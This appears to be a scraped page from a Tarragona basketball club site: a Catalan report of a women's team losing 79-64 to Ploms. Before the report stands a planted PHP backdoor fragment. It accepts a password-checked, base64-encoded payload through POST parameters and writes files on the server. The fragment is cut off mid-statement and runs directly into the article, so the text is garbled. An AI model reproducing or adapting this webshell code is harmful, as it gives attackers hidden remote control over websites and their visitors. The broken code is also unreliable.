function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet A sucumbeix davant l'empenta del Ploms en la segona meitat (79-64) - Tgn Bàsquet Club -

El TGN Bàsquet A sucumbeix davant l’empenta del Ploms en la segona meitat (79-64)

Updated: octubre 24, 2015

Inesperat com un gerro d’aigua freda, com un arbre que et trobes en un revolt enmig de la carretera, com un no quan esperes rebre un sí, com un desengany amorós. El TGN Bàsquet A va patir la cinquena derrota del curs en un partit que havia començat de fàbula, repetint les bones sensacions de tota la temporada i jugant amb una seguretat esfereïdora, conscient de la confiança que donava haver guanyat el primer partit la setmana passada contra el JET Terrassa. Amb tot, el descans va suposar un punt d’inflexió per les tarragonines que es van anar diluint a la pista com un terròs de sucre dins la tassa del cafè matinal. El Ploms va tirar de força, empenta i intensitat per capgirar una dinàmica molt favorable a les visitants que, a còpia de pèrdues de pilota, van donar ales al seu rival. El 16-2 de parcial de mitjans del tercer quart de les reusenques va restablir la igualtat massa aviat i el TGN Bàsquet A, sense haver-ho digerit, va veure com perdia les regnes, la batuta i el domini en el marcador per a sempre. El tercer quart va ser dolent, però el quart període va ser un suplici. Les jugadores semblaven absents de la lucidesa que havien tingut en els primers minuts i el Ploms anava cada vegada a més. Res funcionava, ni l’atac -sense idees, topant contínuament contra les pivots locals que esperaven les penetracions de les liles-, ni la defensa. El tècnic Albert del Rey va situar una zona per intentar canviar la dinàmica del matx però aquesta disposició tàctica no va rutllar. El Ploms va trobar bones posicions de tir i el flamant nou fitxatge blanc-i-negre d’aquesta setmana, la base Jefferson, ho va aprofitar per afusellar des de la línia de tres.

El partit va estar dominat per les visitants des del començament. Els atacs de les liles eren còmodes, circulant la pilota amb rapidesa i claredat i els tirs a mitja distància entraven (14-17 al final del primer quart). La primera línia lila funcionava molt bé en defensa, recuperant moltes pilotes en els inicis ofensius de les locals i fruit d’això van arribar moltes situacions de transició ofensiva. El Ploms estava col·lapsat i, per adobar-ho, Laura Pascual va fer tot un recital en el segon període. Fins a tres triples gairebé consecutius va anotar la base tarragonina, i això catapultava el TGN Bàsquet A a una diferència de 14 punts a favor (20-34 a 3:50 del descans). Amb tot, un parell d’imprecisions de les visitants i un moment de rauxa local, ajustava el marcador a l’equador del matx (33-41).

A començaments del tercer quart, el Ploms va sortir més fort. Va pressionar més la sortida de pilota del TGN Bàsquet A i van sovintejar les pèrdues. Les blanc-i-negres van dur el matx al terreny físic, carregant el joc al pal baix amb les dones altes i aprofitant la superioritat física de les exteriors contra les tarragonines. Un parcial d’16-2 en quatres minuts (del 39-48 al 55-50) canviava completament el panorama. El TGN Bàsquet A es va anar enfonsant anímicament mentre que el Ploms, esperonat per la remuntada, va anar a més.

Els últims deu minuts van ser voler i no poder. Les locals van jugar a pler mentre les liles, desbordades, van acabar encaixant una derrota dura que, a més, penalitza molt la diferència de punts entre els dos equips en cas d’empat a la classificació.